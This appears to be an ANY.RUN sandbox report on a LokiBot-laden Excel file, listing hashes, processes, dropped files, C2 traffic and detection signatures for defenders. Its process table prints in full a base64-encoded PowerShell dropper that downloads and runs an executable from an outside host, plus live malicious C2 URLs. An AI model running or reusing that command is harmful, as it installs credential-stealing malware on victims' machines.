analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

2110375802.xls

Full analysis: https://app.any.run/tasks/28cb14ca-b5e1-4391-87e7-272618fa2a54
Verdict: Malicious activity
Threats:

LokiBot was developed in 2015 to steal information from a variety of applications. Despite the age, this malware is still rather popular among cybercriminals.

Malware Trends Tracker     >>>
Analysis date: November 14, 2018, 10:39:34
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
trojan
lokibot
Indicators:
MIME: application/vnd.ms-excel
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: PC, Last Saved By: PC, Name of Creating Application: Microsoft Excel, Create Time/Date: Tue Nov 13 22:51:19 2018, Last Saved Time/Date: Tue Nov 13 22:51:21 2018, Security: 0
MD5:

83DEAC16DB073345CA12C3F981E37BF3

SHA1:

DCC4E8FF81B14FFF6AB03C606D71F79827839B88

SHA256:

60187E0A37AEF0C2B540D839402979DE34C5AA0E165B5C3B7F836808635DE02C

SSDEEP:

1536:tDZ+RwPONXoRjDhIcp0fDlaGGx+cL26nAAdIEZxlv/umee+m0V25MikRGhjMhY/F:tDZ+RwPONXoRjDhIcp0fDlaGGx+cL26+

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Application was dropped or rewritten from another process

      • c7k5UCte.exe (PID: 3308)
      • mstsc.exe (PID: 2376)

    • Executes PowerShell scripts

      • cMD.exe (PID: 4080)

    • Unusual execution from Microsoft Office

      • EXCEL.EXE (PID: 2844)

    • Starts CMD.EXE for commands execution

      • EXCEL.EXE (PID: 2844)

    • Changes the autorun value in the registry

      • c7k5UCte.exe (PID: 3308)

    • LOKIBOT was detected

      • mstsc.exe (PID: 2376)

    • Detected artifacts of LokiBot

      • mstsc.exe (PID: 2376)

    • Connects to CnC server

      • mstsc.exe (PID: 2376)

    • Actions looks like stealing of personal data

      • mstsc.exe (PID: 2376)

  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 860)
      • mstsc.exe (PID: 2376)

    • Executable content was dropped or overwritten

      • powershell.exe (PID: 860)
      • c7k5UCte.exe (PID: 3308)
      • mstsc.exe (PID: 2376)

    • Loads DLL from Mozilla Firefox

      • mstsc.exe (PID: 2376)

  • INFO

    • Creates files in the user directory

      • EXCEL.EXE (PID: 2844)

    • Reads settings of System Certificates

      • powershell.exe (PID: 860)

    • Reads Microsoft Office registry keys

      • EXCEL.EXE (PID: 2844)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.xls | Microsoft Excel sheet (48)
.xls | Microsoft Excel sheet (alternate) (39.2)

EXIF

FlashPix

CompObjUserType: Microsoft Office Excel 2003 Worksheet
CompObjUserTypeLen: 38
HeadingPairs:
  • Worksheets
  • 3
TitleOfParts:
  • Sheet1
  • Sheet2
  • Sheet3
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 12
Company: -
CodePage: Windows Latin 1 (Western European)
Security: None
ModifyDate: 2018:11:13 22:51:21
CreateDate: 2018:11:13 22:51:19
Software: Microsoft Excel
LastModifiedBy: PC
Author: PC
No data.
screenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
36
Monitored processes
5
Malicious processes
5
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start excel.exe no specs cmd.exe no specs powershell.exe c7k5ucte.exe #LOKIBOT mstsc.exe

Process information

PID
CMD
Path
Indicators
Parent process
2844"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /ddeC:\Program Files\Microsoft Office\Office14\EXCEL.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Version:
14.0.6024.1000
4080cMD & /C PowErSHeLl -En ZgB1AG4AYwB0AGkAbwBuACAAZwBkAG0AVQA1AEMAUwBnAFIANQBFAHUANQA2ADkAMQBmADQAVAByAFMAOABsAHoAdwBFAF8AdAAgACgAIAAkAFkAbgBLAEIAeQBfAEUAbwBSADgAYQBWAEEAVwAgACwAIAAkAEcAMgBPAG0AaABBAGwARAB5AEcAWAB3AHAAaAAxAHcAZwB4AEMAaQAgACkAewAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAIAAkAFkAbgBLAEIAeQBfAEUAbwBSADgAYQBWAEEAVwAgACwAIAAkAEcAMgBPAG0AaABBAGwARAB5AEcAWAB3AHAAaAAxAHcAZwB4AEMAaQAgACkAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAGMAbwBtACAAUwBoAGUAbABsAC4AQQBwAHAAbABpAGMAYQB0AGkAbwBuACkALgBTAGgAZQBsAGwARQB4AGUAYwB1AHQAZQAoACAAJABHADIATwBtAGgAQQBsAEQAeQBHAFgAdwBwAGgAMQB3AGcAeABDAGkAIAApADsAIAB9AA0ACgB0AHIAeQB7AA0ACgANAAoAJABLAFQAZgB4AEYATgBDAHcAUgB5AEoARQBDAG8AVAA9ACQAZQBuAHYAOgBVAFMARQBSAFAAUgBPAEYASQBMAEUAKwAnAFwAYwA3AGsANQBVAEMAdABlAC4AZQB4AGUAJwA7AA0ACgBnAGQAbQBVADUAQwBTAGcAUgA1AEUAdQA1ADYAOQAxAGYANABUAHIAUwA4AGwAegB3AEUAXwB0ACAAJwBoAHQAdABwAHMAOgAvAC8AYQAuAGQAbwBrAG8ALgBtAG8AZQAvAHUAcwByAHQAaQBqAC4AagBwAGcAJwAgACQASwBUAGYAeABGAE4AQwB3AFIAeQBKAEUAQwBvAFQAOwANAAoADQAKAH0AYwBhAHQAYwBoAHsAfQA=C:\Windows\system32\cMD.exeEXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
860PowErSHeLl -En ZgB1AG4AYwB0AGkAbwBuACAAZwBkAG0AVQA1AEMAUwBnAFIANQBFAHUANQA2ADkAMQBmADQAVAByAFMAOABsAHoAdwBFAF8AdAAgACgAIAAkAFkAbgBLAEIAeQBfAEUAbwBSADgAYQBWAEEAVwAgACwAIAAkAEcAMgBPAG0AaABBAGwARAB5AEcAWAB3AHAAaAAxAHcAZwB4AEMAaQAgACkAewAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAIAAkAFkAbgBLAEIAeQBfAEUAbwBSADgAYQBWAEEAVwAgACwAIAAkAEcAMgBPAG0AaABBAGwARAB5AEcAWAB3AHAAaAAxAHcAZwB4AEMAaQAgACkAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAGMAbwBtACAAUwBoAGUAbABsAC4AQQBwAHAAbABpAGMAYQB0AGkAbwBuACkALgBTAGgAZQBsAGwARQB4AGUAYwB1AHQAZQAoACAAJABHADIATwBtAGgAQQBsAEQAeQBHAFgAdwBwAGgAMQB3AGcAeABDAGkAIAApADsAIAB9AA0ACgB0AHIAeQB7AA0ACgANAAoAJABLAFQAZgB4AEYATgBDAHcAUgB5AEoARQBDAG8AVAA9ACQAZQBuAHYAOgBVAFMARQBSAFAAUgBPAEYASQBMAEUAKwAnAFwAYwA3AGsANQBVAEMAdABlAC4AZQB4AGUAJwA7AA0ACgBnAGQAbQBVADUAQwBTAGcAUgA1AEUAdQA1ADYAOQAxAGYANABUAHIAUwA4AGwAegB3AEUAXwB0ACAAJwBoAHQAdABwAHMAOgAvAC8AYQAuAGQAbwBrAG8ALgBtAG8AZQAvAHUAcwByAHQAaQBqAC4AagBwAGcAJwAgACQASwBUAGYAeABGAE4AQwB3AFIAeQBKAEUAQwBvAFQAOwANAAoADQAKAH0AYwBhAHQAYwBoAHsAfQA=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cMD.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3308"C:\Users\admin\c7k5UCte.exe" C:\Users\admin\c7k5UCte.exe
powershell.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
2376"C:\Windows\System32\mstsc.exe"C:\Windows\System32\mstsc.exe
c7k5UCte.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Remote Desktop Connection
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Total events
1 251
Read events
1 139
Write events
0
Delete events
0

Modification events

No data
Executable files
4
Suspicious files
2
Text files
3
Unknown types
4

Dropped files

PID
Process
Filename
Type
2844EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVR212F.tmp.cvr
MD5:
SHA256:
860powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1W33Q1J80OG2PJLOIJKW.temp
MD5:
SHA256:
2376mstsc.exeC:\Users\admin\AppData\Roaming\F63AAA\A71D80.lck
MD5:
SHA256:
860powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF18291e.TMPbinary
MD5:2E6C332796340AFFBFF5230455889D0D
SHA256:6F83140E19865C73D28025CDCE4DC60261AB057414157519A4A1AAA80DF8540E
2376mstsc.exeC:\Users\admin\AppData\Roaming\F63AAA\A71D80.hdbtext
MD5:5302B1B5EC232D44E2D9507FB847FC49
SHA256:20B58A25872B1E3F7D47DAE0C090ACF229C49B6E33939934513499CC37BB2684
2376mstsc.exeC:\Users\admin\AppData\Roaming\F63AAA\A71D80.exeexecutable
MD5:68B4A549D0B56A4DD9A488751037CF09
SHA256:A9286688556DBB45303D3A0E7825294F58FFD48E125518AC33AB009426C967CC
2844EXCEL.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\2110375802.xls.LNKlnk
MD5:7611E5075B017DB880A07B77F8F64CB2
SHA256:B8D92D9E05DFF6B74C1820A38566A1AA5DB1DDC37CE07C0E4E3B0C17A11F3BC5
860powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:2E6C332796340AFFBFF5230455889D0D
SHA256:6F83140E19865C73D28025CDCE4DC60261AB057414157519A4A1AAA80DF8540E
2844EXCEL.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dattext
MD5:60F3263ED112F0C5BDD237A659938246
SHA256:F28F638EC8739DC16D6D2F704C3C8BB1CB848B69C464EB2A348FC02BAA85FA96
3308c7k5UCte.exeC:\Users\admin\AppData\Local\Temp\Disk.sysexecutable
MD5:AC6829C09D6E1FF82721D99F219B6CE2
SHA256:3469E8BA7FAC62360F352CBD1D2876A898030428A6D012A94F64EDADA423BB74
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
5
TCP/UDP connections
6
DNS requests
2
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2376
mstsc.exe
POST
64.137.235.193:80
http://jekone.igg.biz/hm/sgbbu2/cat.php
CA
malicious
2376
mstsc.exe
POST
64.137.235.193:80
http://jekone.igg.biz/hm/sgbbu2/cat.php
CA
malicious
2376
mstsc.exe
POST
64.137.235.193:80
http://jekone.igg.biz/hm/sgbbu2/cat.php
CA
malicious
2376
mstsc.exe
POST
64.137.235.193:80
http://jekone.igg.biz/hm/sgbbu2/cat.php
CA
malicious
2376
mstsc.exe
POST
64.137.235.193:80
http://jekone.igg.biz/hm/sgbbu2/cat.php
CA
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2376
mstsc.exe
64.137.235.193:80
jekone.igg.biz
2267921 ONTARIO LTD
CA
malicious
860
powershell.exe
185.83.214.16:443
a.doko.moe
PT
suspicious

DNS requests

Domain
IP
Reputation
a.doko.moe
  • 185.83.214.16
unknown
jekone.igg.biz
  • 64.137.235.193
malicious

Threats

PID
Process
Class
Message
2376
mstsc.exe
A Network Trojan was detected
ET TROJAN LokiBot User-Agent (Charon/Inferno)
2376
mstsc.exe
A Network Trojan was detected
ET TROJAN LokiBot Checkin
2376
mstsc.exe
A Network Trojan was detected
ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1
2376
mstsc.exe
A Network Trojan was detected
ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2
2376
mstsc.exe
A Network Trojan was detected
MALWARE [PTsecurity] Loki Bot Check-in M2
2376
mstsc.exe
A Network Trojan was detected
ET TROJAN LokiBot User-Agent (Charon/Inferno)
2376
mstsc.exe
A Network Trojan was detected
ET TROJAN LokiBot Checkin
2376
mstsc.exe
A Network Trojan was detected
ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1
2376
mstsc.exe
A Network Trojan was detected
ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2
2376
mstsc.exe
A Network Trojan was detected
MALWARE [PTsecurity] Loki Bot Check-in M2
2 ETPRO signatures available at the full report
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
2110375802.xls